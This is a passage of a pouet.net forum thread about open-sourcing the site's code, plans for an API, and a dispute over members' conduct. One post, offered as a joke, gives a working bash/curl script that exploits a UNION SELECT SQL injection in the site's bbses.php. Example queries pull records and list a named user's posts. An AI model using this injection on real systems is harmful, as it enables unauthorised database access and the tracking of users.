Open sourcing pouet.net ?
category: offtopic [glöplog]
So all we ended up with this open source bull-shit thread was that we are to deploy crap "renderTop10Prods()" code but no proper api?
And instead of a proper api per general we ask lawyers if we can publish the database?
LOL.
Ok might as well scrap me from the site aswell. Together with all the products ive added since they are not facts, they are all pouet statements and most of them never existed.
BBL with new accounts.
And instead of a proper api per general we ask lawyers if we can publish the database?
LOL.
Ok might as well scrap me from the site aswell. Together with all the products ive added since they are not facts, they are all pouet statements and most of them never existed.
BBL with new accounts.
Why don't you empty all that emotion into a well crafted pull request and patch, Haktivah?
Quote:
Hatikvah:
So all we ended up with this open source bull-shit thread was that we are to deploy crap "renderTop10Prods()" code but no proper api?
And instead of a proper api per general we ask lawyers if we can publish the database?
Hey, things take time. The people contributing to Pouet (on the source or otherwise) can't do everything at once, and are otherwise busy with their jobs, etc. Most of this thread was done during the last week. So assuming a full work week, that leaves only evenings to do something.
It's also not like anyone has backtracked on putting in a "proper API", things just have to get there. Unless you're going to start contributing to the code yourself, I think you should have a little patience and some faith! :)
We don't need to start a whole other argument over in here. We've already had 38ish pages of that.
I think this needs repeating:
Perhaps we should go make a demo about this...
Hi
can you explain if you can, in laymans terms, just what is missing or is wrong with the current version of pouet? It is fast and is up all the time, and its main features (bbd, demo db and oneliner) are working fine. I honestly dont know ?!!
can you explain if you can, in laymans terms, just what is missing or is wrong with the current version of pouet? It is fast and is up all the time, and its main features (bbd, demo db and oneliner) are working fine. I honestly dont know ?!!
@ Navis
Well, non-technically, no, there isn't anything "wrong". It works.
However, as noted after the first short period of being open source on GitHub, there were at least a few SQL injection security holes, that even if it weren't open could have eventually been found and used.
The code itself is also complicated and doesn't take in to account newer technologies that would make it easier to avoid such mistakes. The complicated nature of it also makes it hard to add new features without increasing the maintenance complexity or chance of breaking other existing features. There are plenty of new features or improvements to existing features that could be integrated if it were easier to do.
Well, non-technically, no, there isn't anything "wrong". It works.
However, as noted after the first short period of being open source on GitHub, there were at least a few SQL injection security holes, that even if it weren't open could have eventually been found and used.
The code itself is also complicated and doesn't take in to account newer technologies that would make it easier to avoid such mistakes. The complicated nature of it also makes it hard to add new features without increasing the maintenance complexity or chance of breaking other existing features. There are plenty of new features or improvements to existing features that could be integrated if it were easier to do.
If you want an explicit list of things "missing", you can check the roadmap in the main readme or the issues listed at the project's github project repository.
Quote:
by AMcBain:
there were at least a few SQL injection security holes
holes found and fixed*
I guess ideally the new commits should not go to 'live pouet' immediately and should be reviewed to make sure that new exploits are not being introduced?
Normally if you use the pull model and topic branches, merging / commiting to master *is* the result of a review.
Dbug: the readme at https://github.com/kebby/pouet.net/tree/master/contribs explains the process. Changes aka pull requests are first tried out on a staging version of the site, and when they're approved they go to the master branch which will auto-deploy on the live site.
Now we've got everything pretty much sorted, we can get cracking on the next problem: deleting iq's account. :P
lator: API is planned, no worries, it's gonna happen !
/!\ DONT PANIC /!\
/!\ DONT PANIC /!\
damn, this thread is growing super fast!
I'm kinda lost here, can someone please try to summarize the last 42 pages in few paragraphs?
I'm kinda lost here, can someone please try to summarize the last 42 pages in few paragraphs?
Everything is well again. Sort of.
TLM: Analogue wanted to open up the Pouet codebase, but people were concerned that this would interfere with Gargaj's work on Pouet v2. So then PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES and both versions were open-sourced, and Gargaj is still an admin and is still going to work on Pouet v2, and a bunch of other people have submitted security patches and new features, and people are working on getting as much data as possible available while staying on the right side of privacy/copyright, and everyone learned an important lesson about friendship.
so friendship IS magic!
I do not understand what is issue with pouet open sores and pouet API ??? Pouet has had API for years !! I recently discuss with Gargaj and he say this not dangerous feature!! I implement following high-tech bash script for direct pouet.NET DB interface:
is use is simple. normal SQL interface, lets find prod with most votes:
see, easy for average SQL/Webmonkey!! One restriction here.. we can only is limit to ONE column and row per result. but clever monkey can is make use of GROUP_CONCAT and friends hehhheh.
I call this Pouet BOP interface! (BBS Oriented Programming) Have fun!!
Code:
#!/bin/bash
function urlencode {
echo -ne "$@" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g'
}
POUET="http://pouet.net/bbses.php"
MAGIC="0%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%201"
QUERY="which=${MAGIC},("`urlencode $1`"),0xba,0xdc,0xed,0xbe,0xef,0xba,0xbe%23"
curl -s "${POUET}?${QUERY}" | grep "which=1" | cut -c 37- | awk -F '</a>' '{print $1}'is use is simple. normal SQL interface, lets find prod with most votes:
Code:
$ ./pouet.sh "SELECT name FROM prods ORDER BY voteup DESC LIMIT 1"
fr-041: debris.see, easy for average SQL/Webmonkey!! One restriction here.. we can only is limit to ONE column and row per result. but clever monkey can is make use of GROUP_CONCAT and friends hehhheh.
I call this Pouet BOP interface! (BBS Oriented Programming) Have fun!!
there's an error in your code man, it should be MAGIC="FRIENDSHIP"
Oh, is one more problem. if user want use string literals, cannot use normal notation 'like this' or 'LIKE THAT'. Will have to use hex encoded string literal to is make bypass of quote characttre.
For example we want find group ID of most famous BITS (HERMAN SAMSO) group. We is convert "BITS" to hex -> 42 49 54 53 and make craft SQL query:
Bingo! Group ID 5718 is BITS!
For example we want find group ID of most famous BITS (HERMAN SAMSO) group. We is convert "BITS" to hex -> 42 49 54 53 and make craft SQL query:
Code:
$ ./pouet.sh "SELECT id FROM groups WHERE name = 0x42495453"
5718Bingo! Group ID 5718 is BITS!
Another practic exampl. Say if you dont like person called MAGIC and want to know where he hang on Pouet BBS. So you can avoid direct contact with this guy..
We find ID for MAGIC guy:
Now.. we find all post for evil magic guy:
get creative!!!
We find ID for MAGIC guy:
Code:
$ ~/pouet.sh "SELECT id FROM users WHERE nickname = 0x4d61676963"
4627Now.. we find all post for evil magic guy:
Code:
for i in `seq 0 100`; do ~/pouet.sh "SELECT DISTINCT topic FROM bbs_posts WHERE author = 4627 LIMIT $i,1" ; done
1293
1710
1603
640
1754
1806
1812
1830
1799
1842
..get creative!!!
Quote:
so friendship IS magic!
<3 <3 <3 (:
Gloom: I'm really concerned about what you did here. Page after page, you did nothing but fuel the fire.
In my opinion, the opposite of "let's pretend nothing happened and move on" isn't what you did.
Gloom, these are your words (emphasis mine):
Gloom, you don't accept the situation: I get it. You raise your voice: perfectly fine by me. But please acknowledge my humble (hopeless?) resistance against your violent behavior. I feel outraged by the way you handled it: you mismanaged it, really. Post after post, you just spread more and more hate.
Gloom, since we're not sharing projects together I believe we'll never have to disagree on something else than comments on Pouet. And in fact I feel relieved because you apparently use everything it takes to crush your opponents (from your own fame to networking). Again, that doesn't mean I'm with Analogue (we don't even know each other bla bla bla etc.)
All in all Gloom, we didn't need your campaign against Analogue. We needed Analogue to have the guts to apologize. We needed Gargaj to get through the difficult pride/trust situation. Hopefully, that's how it ended.
Gloom, I wish we could have all read you after Analogue apologized.
Gargaj, you impressed me.
In my opinion, the opposite of "let's pretend nothing happened and move on" isn't what you did.
Gloom, these are your words (emphasis mine):
Quote:
As a community, I can't accept that we just stand back and watch while these events unfold.
Quote:
Analogue is getting resistance because he's in the wrong, and doubly so because of the way he responds to the resistance. The fact that he's unable to grasp just how badly he has behaved and mismanaged the situation just makes it worse.
Gloom, you don't accept the situation: I get it. You raise your voice: perfectly fine by me. But please acknowledge my humble (hopeless?) resistance against your violent behavior. I feel outraged by the way you handled it: you mismanaged it, really. Post after post, you just spread more and more hate.
Gloom, since we're not sharing projects together I believe we'll never have to disagree on something else than comments on Pouet. And in fact I feel relieved because you apparently use everything it takes to crush your opponents (from your own fame to networking). Again, that doesn't mean I'm with Analogue (we don't even know each other bla bla bla etc.)
All in all Gloom, we didn't need your campaign against Analogue. We needed Analogue to have the guts to apologize. We needed Gargaj to get through the difficult pride/trust situation. Hopefully, that's how it ended.
Gloom, I wish we could have all read you after Analogue apologized.
Gargaj, you impressed me.
Q439#2!:
Not sure about that. I think he made a difference. I think you're just reacting to his style. When Gloom is right, he is usually loud about it. And Gloom is seldom wrong.
And if things like style could rub you the wrong way, you should steer clear of pouet. It's a dreadful place. In fact, if there was no pouet tomorrow, I would shed no tears. But if I did, it would be on behalf of the poor sod that kept the site alive and functional before it was shot down by a nostalgic jerk.
Quote:
All in all Gloom, we didn't need your campaign against Analogue.
Not sure about that. I think he made a difference. I think you're just reacting to his style. When Gloom is right, he is usually loud about it. And Gloom is seldom wrong.
And if things like style could rub you the wrong way, you should steer clear of pouet. It's a dreadful place. In fact, if there was no pouet tomorrow, I would shed no tears. But if I did, it would be on behalf of the poor sod that kept the site alive and functional before it was shot down by a nostalgic jerk.
Quote:
by ٩๏&#:
We needed Analogue to have the guts to apologize. [...] Hopefully, that's how it ended.
Yes, yes it did. Please read back a page two pages, thanks.